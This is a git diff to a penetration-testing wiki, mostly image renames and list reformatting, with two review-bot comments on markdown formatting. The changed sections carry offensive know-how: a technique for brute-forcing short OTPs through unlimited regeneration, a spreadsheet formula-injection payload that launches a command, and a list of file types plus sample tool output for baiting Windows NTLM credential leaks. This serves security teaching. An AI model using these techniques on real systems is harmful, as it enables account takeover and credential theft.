diff --git a/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (2).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1).png similarity index 100% rename from .gitbook/assets/image (107) (2) (2) (2) (2) (2) (2).png rename to .gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1).png diff --git a/.gitbook/assets/image (107) (2) (2) (2) (2) (2).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2).png similarity index 100% rename from .gitbook/assets/image (107) (2) (2) (2) (2) (2).png rename to .gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2).png diff --git a/.gitbook/assets/image (25) (2) (2) (2) (1).png b/.gitbook/assets/image (25) (2) (2) (2) (2) (1).png similarity index 100% rename from .gitbook/assets/image (25) (2) (2) (2) (1).png rename to .gitbook/assets/image (25) (2) (2) (2) (2) (1).png diff --git a/.gitbook/assets/image (25) (2) (2) (2).png b/.gitbook/assets/image (25) (2) (2) (2) (2) (2).png similarity index 100% rename from .gitbook/assets/image (25) (2) (2) (2).png rename to .gitbook/assets/image (25) (2) (2) (2) (2) (2).png diff --git a/.gitbook/assets/image (253) (1).png b/.gitbook/assets/image (253) (1) (2) (1).png similarity index 100% rename from .gitbook/assets/image (253) (1).png rename to .gitbook/assets/image (253) (1) (2) (1).png diff --git a/.gitbook/assets/image (254) (1) (1) (1) (1).png b/.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (254) (1) (1) (1) (1).png rename to .gitbook/assets/image (254) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (345) (2) (2) (2) (2) (1).png b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (1).png similarity index 100% rename from .gitbook/assets/image (345) (2) (2) (2) (2) (1).png rename to .gitbook/assets/image (345) (2) (2) (2) (2) (2) (1).png 
diff --git a/.gitbook/assets/image (345) (2) (2) (2) (2).png b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2).png similarity index 100% rename from .gitbook/assets/image (345) (2) (2) (2) (2).png rename to .gitbook/assets/image (345) (2) (2) (2) (2) (2) (2).png diff --git a/.gitbook/assets/image (413) (3) (1).png b/.gitbook/assets/image (413) (3) (3) (1).png similarity index 100% rename from .gitbook/assets/image (413) (3) (1).png rename to .gitbook/assets/image (413) (3) (3) (1).png diff --git a/.gitbook/assets/image (413) (3) (2).png b/.gitbook/assets/image (413) (3) (3) (2).png similarity index 100% rename from .gitbook/assets/image (413) (3) (2).png rename to .gitbook/assets/image (413) (3) (3) (2).png diff --git a/.gitbook/assets/image (413) (3).png b/.gitbook/assets/image (413) (3) (3) (3).png similarity index 100% rename from .gitbook/assets/image (413) (3).png rename to .gitbook/assets/image (413) (3) (3) (3).png diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 656f1e083..703600dc6 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -10,7 +10,7 @@ dht udp "DHT Nodes" ![](.gitbook/assets/image%20%28182%29.png) -![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png) +![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png) InfluxDB diff --git a/SUMMARY.md b/SUMMARY.md index 068a2aa75..8c00a331b 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -297,7 +297,7 @@ ## Pentesting Web -* [2FA Bypass](pentesting-web/2fa-bypass.md) +* [2FA/OTP Bypass](pentesting-web/2fa-bypass.md) * [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) * [Bypass Payment Process](pentesting-web/bypass-payment-process.md) * [Captcha Bypass](pentesting-web/captcha-bypass.md) diff --git a/forensics/basic-forensics-esp/linux-forensics.md b/forensics/basic-forensics-esp/linux-forensics.md index c963b5e25..dc24071dc 100644 
--- a/forensics/basic-forensics-esp/linux-forensics.md +++ b/forensics/basic-forensics-esp/linux-forensics.md @@ -395,7 +395,7 @@ Partition Record Format: In order to mount a MBR in Linux you first need to get the start offset \(you can use `fdisk` and the the `p` command\) -![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%281%29.png) +![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%283%29%20%281%29.png) An then use the following code diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 6723970f2..e115832c8 100644 --- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n ![](../../../.gitbook/assets/image%20%28211%29.png) -![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png) +![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png) Because you will be able to call them diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md index 5fb07cfbc..7aeecc388 100644 --- a/pentesting-web/2fa-bypass.md +++ b/pentesting-web/2fa-bypass.md @@ -1,4 +1,4 @@ -# 2FA Bypass +# 2FA/OTP Bypass ## **Bypassing two-factor authentication** 
@@ -57,6 +57,10 @@ Sometimes you can configure the 2FA for some actions inside your account \(chang You want be able to bypass the 2FA but you will be able to waste money of the company. +#### Infinite OTP regeneration + +If you can **generate a new OTP infinite times**, the **OTP is simple enough** \(4 numbers\), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using. + ### CSRF/Clickjacking Check if there is a CSRF or a Clickjacking vulnerability to disable the 2FA. diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md index b82f194db..4e31dd35e 100644 --- a/pentesting-web/formula-injection.md +++ b/pentesting-web/formula-injection.md @@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** -![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%281%29.png) +![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png) diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md index b78bd7811..f5431d1a3 100644 --- a/pentesting/pentesting-web/wordpress.md +++ b/pentesting/pentesting-web/wordpress.md @@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t ``` -![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png) +![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png) ![](../../.gitbook/assets/image%20%28224%29.png) diff --git a/phishing-methodology/README.md b/phishing-methodology/README.md index a8468752c..ecd8117c4 100644 --- a/phishing-methodology/README.md +++ b/phishing-methodology/README.md 
@@ -320,7 +320,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29.png) +![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29.png) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working. diff --git a/windows/ntlm/places-to-steal-ntlm-creds.md b/windows/ntlm/places-to-steal-ntlm-creds.md index 2fc71b76f..1291441b7 100644 --- a/windows/ntlm/places-to-steal-ntlm-creds.md +++ b/windows/ntlm/places-to-steal-ntlm-creds.md 
@@ -6,58 +6,70 @@ This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**. -#### ntlm_theft supports the following attack types: +#### ntlm\_theft supports the following attack types: + Browse to Folder Containing: -- .url – via URL field -- .url – via ICONFILE field -- .lnk - via icon_location field -- .scf – via ICONFILE field (Not Working on Latest Windows) -- autorun.inf via OPEN field (Not Working on Latest Windows) -- desktop.ini - via IconResource field (Not Working on Latest Windows) + +* .url – via URL field +* .url – via ICONFILE field +* .lnk - via icon\_location field +* .scf – via ICONFILE field \(Not Working on Latest Windows\) +* autorun.inf via OPEN field \(Not Working on Latest Windows\) +* desktop.ini - via IconResource field \(Not Working on Latest Windows\) Open Document: -- .xml – via Microsoft Word external stylesheet -- .xml – via Microsoft Word includepicture field -- .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted) -- .docx – via Microsoft Word includepicture field --.docx – via Microsoft Word external template --.docx – via Microsoft Word frameset webSettings --.xlsx - via Microsoft Excel external cell --.wax - via Windows Media Player playlist (Better, primary open) --.asx – via Windows Media Player playlist (Better, primary open) --.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy) --.jnlp – via Java external jar --.application – via any Browser (Must be served via a browser downloaded or won’t run) + +* .xml – via Microsoft Word external stylesheet +* .xml – via Microsoft Word includepicture field +* .htm – via Chrome & IE & Edge img src \(only if opened locally, not hosted\) +* .docx – via Microsoft Word includepicture field + + -.docx – via Microsoft Word external template + + -.docx – via Microsoft Word frameset webSettings + + -.xlsx - via Microsoft Excel external cell + + -.wax - via 
Windows Media Player playlist \(Better, primary open\) + + -.asx – via Windows Media Player playlist \(Better, primary open\) + + -.m3u – via Windows Media Player playlist \(Worse, Win10 opens first in Groovy\) + + -.jnlp – via Java external jar + + -.application – via any Browser \(Must be served via a browser downloaded or won’t run\) Open Document and Accept Popup: -- .pdf – via Adobe Acrobat Reader +* .pdf – via Adobe Acrobat Reader Click Link in Chat Program: -- .txt – formatted link to paste into Zoom chat + +* .txt – formatted link to paste into Zoom chat > Example : -```sh -# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test -Created: test/test.scf (BROWSE) -Created: test/test-(url).url (BROWSE) -Created: test/test-(icon).url (BROWSE) -Created: test/test.rtf (OPEN) -Created: test/test-(stylesheet).xml (OPEN) -Created: test/test-(fulldocx).xml (OPEN) -Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) -Created: test/test-(includepicture).docx (OPEN) -Created: test/test-(remotetemplate).docx (OPEN) -Created: test/test-(frameset).docx (OPEN) -Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) -Created: test/test.asx (OPEN) -Created: test/test.jnlp (OPEN) -Created: test/test.application (DOWNLOAD AND OPEN) -Created: test/test.pdf (OPEN AND ALLOW) -Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) -Generation Complete. 
-``` - +> +> ```bash +> # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test +> Created: test/test.scf (BROWSE) +> Created: test/test-(url).url (BROWSE) +> Created: test/test-(icon).url (BROWSE) +> Created: test/test.rtf (OPEN) +> Created: test/test-(stylesheet).xml (OPEN) +> Created: test/test-(fulldocx).xml (OPEN) +> Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) +> Created: test/test-(includepicture).docx (OPEN) +> Created: test/test-(remotetemplate).docx (OPEN) +> Created: test/test-(frameset).docx (OPEN) +> Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) +> Created: test/test.asx (OPEN) +> Created: test/test.jnlp (OPEN) +> Created: test/test.application (DOWNLOAD AND OPEN) +> Created: test/test.pdf (OPEN AND ALLOW) +> Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) +> Generation Complete. +> ``` ### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All_NTLM_leak)
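Review bot: In the pentesting-web/2fa-bypass.md hunk, the new "Infinite OTP regeneration" section is added as a level-4 heading (`#### Infinite OTP regeneration`) while the neighbouring sections in the same file use level 3 (`### CSRF/Clickjacking`), so it will render as a sub-section of the preceding topic rather than as its own item; change it to `### Infinite OTP regeneration`. In the paragraph itself, "4 numbers" should read "4 digits" (the point is the small keyspace of a 4-digit code), and it would be worth stating the condition the technique depends on, namely that the server neither rate-limits verification attempts across regenerated OTPs nor invalidates the session after repeated failures, since that is what a defender needs to fix.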
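Review bot: In the windows/ntlm/places-to-steal-ntlm-creds.md hunk, the list conversion is incomplete: the first four "Open Document" entries become `*` bullets, but the remaining nine (`-.docx – via Microsoft Word external template` through `-.application – via any Browser ...`) are left as bare `-.docx` text separated by blank lines, so they will render as plain paragraphs beginning with "-." instead of list items, and `.xlsx`, `.wax`, `.asx`, `.m3u`, `.jnlp` and `.application` drop out of the bullet list entirely. Convert each to the same form as the lines above it, e.g. `* .docx – via Microsoft Word external template` and `* .xlsx - via Microsoft Excel external cell`, and remove the blank lines between them so the list stays contiguous. Minor: the "Browse to Folder Containing:" and "Open Document:" labels now have a blank line before their lists but "Open Document and Accept Popup:" does not, so the spacing should be made consistent as well.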